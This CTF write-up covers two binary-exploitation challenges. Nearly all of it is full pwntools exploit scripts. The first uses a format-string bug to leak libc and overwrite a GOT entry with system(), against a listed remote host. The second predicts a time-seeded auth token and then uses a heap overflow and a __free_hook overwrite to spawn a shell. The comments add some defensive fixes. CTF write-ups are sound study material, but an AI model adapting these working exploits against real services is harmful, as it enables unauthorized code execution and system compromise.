究极输出

bss 段格式化字符串漏洞，emm 感觉有一点点小坑，但不算难。

from pwn import *
# r = process('./pwn1')
# Remote target plus handles on the challenge binary and the libc pwntools resolves
# for it (the local-process variant is kept commented out above).
r = remote("39.105.99.40", 16018)
e = ELF('./pwn1')
libc = e.libc

# pwntools context: verbose tube logging, gdb opened in a tmux split pane.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# Short aliases over the tube API. Kept as lambdas so `r` is resolved at call time.
se = lambda payload: r.send(payload)
sa = lambda marker, payload: r.sendafter(marker, payload)
sl = lambda payload: r.sendline(payload)
sla = lambda marker, payload: r.sendlineafter(marker, payload)
sea = lambda marker, payload: r.sendafter(marker, payload)
rc = lambda numb=4096: r.recv(numb)
rl = lambda: r.recvline()
ru = lambda marker: r.recvuntil(marker)
# Pointer helpers: read up to `marker`, keep the trailing raw bytes, zero-pad, unpack.
uu32 = lambda marker: u32(ru(marker)[-4:].ljust(4, b'\0'))
uu64 = lambda marker: u64(ru(marker)[-6:].ljust(8, b'\0'))
# Logging helpers; addresses are printed as 0x-prefixed hex.
info_base = lambda tag, base: r.info(tag + ': ' + format(base, '#x'))
leak = lambda name, base: log.success(f'{name} = {base:#x}')

def dbg(cmd):
    """Attach gdb to the live tube `r`, executing `cmd` as the gdb script."""
    gdb.attach(r, gdbscript=cmd)

# Interaction with the service. The underlying bug class is a user-controlled
# printf format string (the write-up says the buffer lives in .bss). From the
# defensive side, `printf("%s", buf)` / -Wformat-security removes the primitive
# and Full RELRO would keep the GOT read-only.
# NOTE(review): the stack-argument indices (6, 8, 9, 17, 36) and every constant
# below are specific to this binary and libc build.
ru(b'HELLO?PWN IT!!!\n')
# Ask for stack slot 9 as a pointer; the reply is parsed as hex below.
sl(b"%9$p")

# A GOT entry address in the (non-PIE) binary. Not referenced directly below, but
# 13200 == 0x3390 == got & 0xffff and 13200 + 4194306 == 0x403392 == got + 2 (see pl1).
got = 0x403390

# Candidate gadget offsets for this libc (inferred from the name); only og[0] is used,
# and only for logging.
og = [0x45226,0x4527a,0xf03a4,0xf1247]
# 14 bytes of "0x..." text -> int; 0x20840 is the leaked value's offset inside libc
# — TODO confirm against the libc used.
libc_base = int(rc(14),16)-0x20840
leak("libc_base",libc_base)
# NOTE: `sys` shadows the standard-library module name.
sys = libc_base + libc.sym['system']
# Split system()'s address into the two pieces written later: low 16 bits (offest1)
# and bits 16..23 (offest2). offest3 is only an intermediate value.
offest1 = sys & 0xffff
offest3 = sys & 0xffffff
offest2 = int(offest3/0x10000)
shell = libc_base + og[0]
# First write (printf counts are cumulative): 13200 via %hn into slot 6, then
# 13200 + 4194306 via %n into slot 17 — presumably staging got and got + 2 in the
# stack slots (36 and 8) that pl2 targets; TODO confirm in gdb.
pl1 = '%13200c%6$hn%4194306c%17$n'
sl(pl1.encode())

leak('sys',sys)
leak("shell",shell)
# Second write goes through stack slots 36 (one byte) and 8 (half-word).
ru(b'HELLO?PWN IT!!!\n')
# %hhn writes offest2; the second width is offest1 - offest2 so the cumulative
# count equals offest1 at the %hn. Assumes offest1 >= offest2 — otherwise a
# negative width is emitted.
pl2 = "%" + "{}c".format(offest2) + "%36$hhn"
pl2 += "%" + "{}c".format(offest1-offest2) + "%8$hn"
sl(pl2.encode())

# dbg('')

r.interactive()

humidCtr

一道协议 pwn，漏洞很明显，逆出协议就不难了。

from pwn import *
from ctypes import *

# Local target process plus handles on the binary and the libc pwntools resolves for it.
r = process('./pwn2')
e = ELF('./pwn2')
libc = e.libc
# Host libc loaded through ctypes so the script can mirror the service's rand() stream.
dll = cdll.LoadLibrary("libc.so.6")

# pwntools context: verbose tube logging, gdb opened in a tmux split pane.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# Short aliases over the tube API. Kept as lambdas so `r` is resolved at call time.
se = lambda payload: r.send(payload)
sa = lambda marker, payload: r.sendafter(marker, payload)
sl = lambda payload: r.sendline(payload)
sla = lambda marker, payload: r.sendlineafter(marker, payload)
sea = lambda marker, payload: r.sendafter(marker, payload)
rc = lambda numb=4096: r.recv(numb)
rl = lambda: r.recvline()
ru = lambda marker: r.recvuntil(marker)
# Pointer helpers: read up to `marker`, keep the trailing raw bytes, zero-pad, unpack.
uu32 = lambda marker: u32(ru(marker)[-4:].ljust(4, b'\0'))
uu64 = lambda marker: u64(ru(marker)[-6:].ljust(8, b'\0'))
# Logging helpers; addresses are printed as 0x-prefixed hex.
info_base = lambda tag, base: r.info(tag + ': ' + format(base, '#x'))
leak = lambda name, base: log.success(f'{name} = {base:#x}')

# Seed the host PRNG with the current time so a later rand() matches a peer that
# seeds the same way. NOTE(review): dll.time() is invoked without its pointer
# argument and with ctypes' default int return type — it works in practice but is
# not a clean call. A time-seeded rand() is guessable by design; anything used as
# an auth token should come from a CSPRNG.
dll.srand(dll.time())
def dbg(cmd):
    """Attach gdb to `r` with `cmd` as the gdb script, then block until the user continues."""
    gdb.attach(r, gdbscript=cmd)
    pause()

def add(idx, size, cont):
    """Send the opcode-0x01 ("add") request: idx, size and cont, each followed by '&'.

    Waits for the service prompt first. `cont` must already be bytes.
    """
    ru(b'>\n')
    fields = [str(idx).encode(), str(size).encode(), cont, b'']
    se(b'POST / HTTP/1.0 \r\n\x01&' + b'&'.join(fields))

def edit(idx, cont):
    """Send the opcode-0x02 ("edit") request: idx and cont, each followed by '&'.

    Waits for the service prompt first. `cont` must already be bytes.
    """
    ru(b'>\n')
    fields = [str(idx).encode(), cont, b'']
    se(b'POST / HTTP/1.0 \r\n\x02&' + b'&'.join(fields))
def show(idx):
    """Send the opcode-0x03 ("show") request for slot `idx` (no trailing '&')."""
    ru(b'>\n')
    request = b'POST / HTTP/1.0 \r\n\x03&' + str(idx).encode()
    se(request)
def delete(idx):
    """Send the opcode-0x04 ("delete") request for slot `idx` (no trailing '&')."""
    ru(b'>\n')
    request = b'POST / HTTP/1.0 \r\n\x04&' + str(idx).encode()
    se(request)

# Auth token: one rand() after the srand(time()) done in the setup above. Presumably
# the service derives its token the same way — TODO confirm. Defensively, a
# time-seeded rand() is predictable; tokens need a CSPRNG.
num = dll.rand()
#login
ru(b'>\n')
# The author flagged this step as unreliable. Observation only: this request line
# reads "HTTP1.0" while the POST helpers send "HTTP/1.0" — whether that is intended
# is unverified.
se(b'DEV / HTTP1.0 \r\n' + p32(num) + b"auth") #some problems
# Leak: allocate slot 0 (size 0x48), show it, read until a 0x7f byte and unpack the
# last 6 bytes as a pointer; 0x1ecb61 is that value's offset inside libc — TODO
# confirm per libc build.
add(0,0x48,b'a')
show(0)
libc_base = uu64(b'\x7f')-0x1ecb61
# Unused below (candidate gadget offsets, inferred from the name).
og = [0xe3afe,0xe3b01,0xe3b04]
free_hook = libc_base + libc.sym['__free_hook']
sys = libc_base + libc.sym['system']   # NOTE: shadows the stdlib module name
leak('libc_base',libc_base)
# Two more same-size slots, freed in reverse order so slot 1's chunk is handed back first.
add(1,0x48,b'b')
add(2,0x48,b'b')
delete(2)
delete(1)
# edit() on slot 0 with 0x28 bytes: 0x20 of padding then a pointer. This looks like
# an out-of-bounds write into the freed neighbour's first field — TODO confirm the
# heap layout in gdb. The defensive fix is bounding edit() by the stored size; note
# also that later glibc releases removed __free_hook entirely.
pl1 = b'a'*0x20 + p64(free_hook)
edit(0,pl1)
# Allocations after the corruption: slot 3 receives "/bin/sh", slot 1 receives
# system()'s address; delete(3) then frees the "/bin/sh" buffer. The intended effect
# (free -> system via the hook) is inferred from the names — verify.
add(3,0x48,b'/bin/sh\x00')
add(1,0x48,p64(sys))
delete(3)

r.interactive()